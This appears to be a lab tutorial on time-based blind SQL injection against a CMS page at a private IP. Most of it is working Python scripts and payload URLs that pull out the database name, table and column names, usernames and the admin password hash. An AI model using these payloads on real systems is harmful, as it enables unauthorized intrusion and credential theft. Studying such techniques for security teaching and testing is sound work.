Delayed injection
Because of network latency and other factors, a request timeout that is too short makes the brute-force unreliable (a slow but normal response is mistaken for a sleep), while a timeout that is too long makes every request, and so the whole brute-force, slower.
Principle
The if() condition decides the response time: when the condition is true the query calls sleep() and the response is delayed, otherwise there is no delay.
Here the name is tested one character at a time. If the first character of the current database name matches, the page takes five seconds to load.
http://10.9.47.148/cms/show.php?id=33 and if(substr(database(),1,1)='c',sleep(5),1)
Decision criterion in the script: the response delay.
To save time, the sleep is reduced to 1 second (and the client timeout set to match).
Brute-forcing this way takes longer than boolean-based blind injection: every matching character costs a full sleep on top of the request round trip.
Brute-forcing the database name
import string
import requests

# Character set for a database name: digits, letters and underscore
charset = string.digits + string.ascii_letters + '_'

database_name = ""
# substr() positions start at 1, not 0; try positions 1-4
for i in range(1, 5):
    # Try every character of the set at this position
    for j in charset:
        url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr(database(),{i},1)='{j}',sleep(1),1)"
        # A ReadTimeout means the server slept, so this character matches:
        # append it to database_name and move on to the next position.
        try:
            res = requests.get(url=url, timeout=1)
        except requests.exceptions.ReadTimeout:
            database_name += j
            break
    else:
        # No character matched at this position: the end of the name was reached
        break
print(database_name)
Brute-forcing table names
Test each character of each table name in turn; if the response is delayed (the server slept), the character matches.
http://10.9.47.148/cms/show.php?id=33 and if(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)='c',sleep(5),1)
Script source code
import string
import requests

# Character set for a table name: digits, letters and underscore
charset = string.digits + string.ascii_letters + '_'

# Go through tables 0-19 of the current database, one row of information_schema.tables at a time
for i in range(0, 20):
    # Start with an empty name for each table
    table_name = ""
    # Assume a table name is at most 10 characters; test it one position at a time
    for j in range(1, 11):
        for name_str in charset:
            url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select table_name from information_schema.tables where table_schema = database() limit {i},1),{j},1)='{name_str}',sleep(1),1)"
            # A ReadTimeout means the server slept, so this character matches:
            # append it to table_name and move on to the next position.
            try:
                res = requests.get(url=url, timeout=1)
            except requests.exceptions.ReadTimeout:
                table_name += name_str
                break
        else:
            # No character matched at this position: the end of this table name was reached
            break
    if not table_name:
        # An empty name means there are no more tables
        break
    print(table_name)
Brute-forcing the cms_users table
Brute-forcing column names
http://10.9.47.148/cms/show.php?id=33 and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 0,1),1,1)='u',sleep(5),1)
The response is delayed when the character matches.
Because of network latency and other factors, a timeout that is too short makes the brute-force unreliable, while one that is too long makes it slow. Here both the sleep and the timeout are raised to 3 seconds for accuracy, so the run takes somewhat longer; if no error is reported, wait patiently.
import string
import requests

# Character set for a column name: digits, letters and underscore
charset = string.digits + string.ascii_letters + '_'

# Go through columns 0-9 of cms_users (assuming at most 10 columns)
for i in range(0, 10):
    # Start with an empty name for each column
    column_name = ""
    # Assume a column name is at most 10 characters; test it one position at a time
    for j in range(1, 11):
        for name_str in charset:
            url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {i},1),{j},1)='{name_str}',sleep(3),1)"
            # A ReadTimeout means the server slept, so this character matches:
            # append it to column_name and move on to the next position.
            try:
                res = requests.get(url=url, timeout=3)
            except requests.exceptions.ReadTimeout:
                column_name += name_str
                break
        else:
            # No character matched at this position: the end of this column name was reached
            break
    if not column_name:
        # An empty name means there are no more columns
        break
    print(column_name)
Brute-forcing the usernames
http://10.9.47.148/cms/show.php?id=33 and if(substr((select username from cms_users limit 0,1),1,1)='a',sleep(5),1)
Script source code
import string
import requests

# Character set for a username: digits, letters and underscore
charset = string.digits + string.ascii_letters + '_'

# Go through rows 0-9 of cms_users (assuming at most 10 users)
for i in range(0, 10):
    # Start with an empty name for each row
    username = ""
    # Assume a username is at most 10 characters; test it one position at a time
    for j in range(1, 11):
        for name_str in charset:
            url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select username from cms_users limit {i},1),{j},1)='{name_str}',sleep(5),1)"
            # A ReadTimeout means the server slept, so this character matches.
            # Caveat: '=' is case-insensitive under MySQL's default collation, so the
            # letter case recovered here is whichever case the character set tries first.
            try:
                res = requests.get(url=url, timeout=1)
            except requests.exceptions.ReadTimeout:
                username += name_str
                break
        else:
            # No character matched at this position: the end of this username was reached
            break
    if not username:
        # An empty name means there are no more rows
        break
    print(username)
Brute-forcing the admin password
Source code
import string
import requests

# Character set: digits, letters and underscore (for an MD5 hash, 0-9 and a-f would be enough)
charset = string.digits + string.ascii_letters + '_'

password = ""
# The password is stored as an MD5 hash, which is 32 hex characters, so test positions 1-32
for j in range(1, 33):
    for name_str in charset:
        url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select password from cms_users where username = 'admin' limit 0,1),{j},1)='{name_str}',sleep(1),1)"
        # Only one request per candidate, with a timeout: a ReadTimeout means the
        # server slept, so this character matches and is appended to password.
        try:
            res = requests.get(url=url, timeout=1)
        except requests.exceptions.ReadTimeout:
            password += name_str
            break
print(password)
Decrypt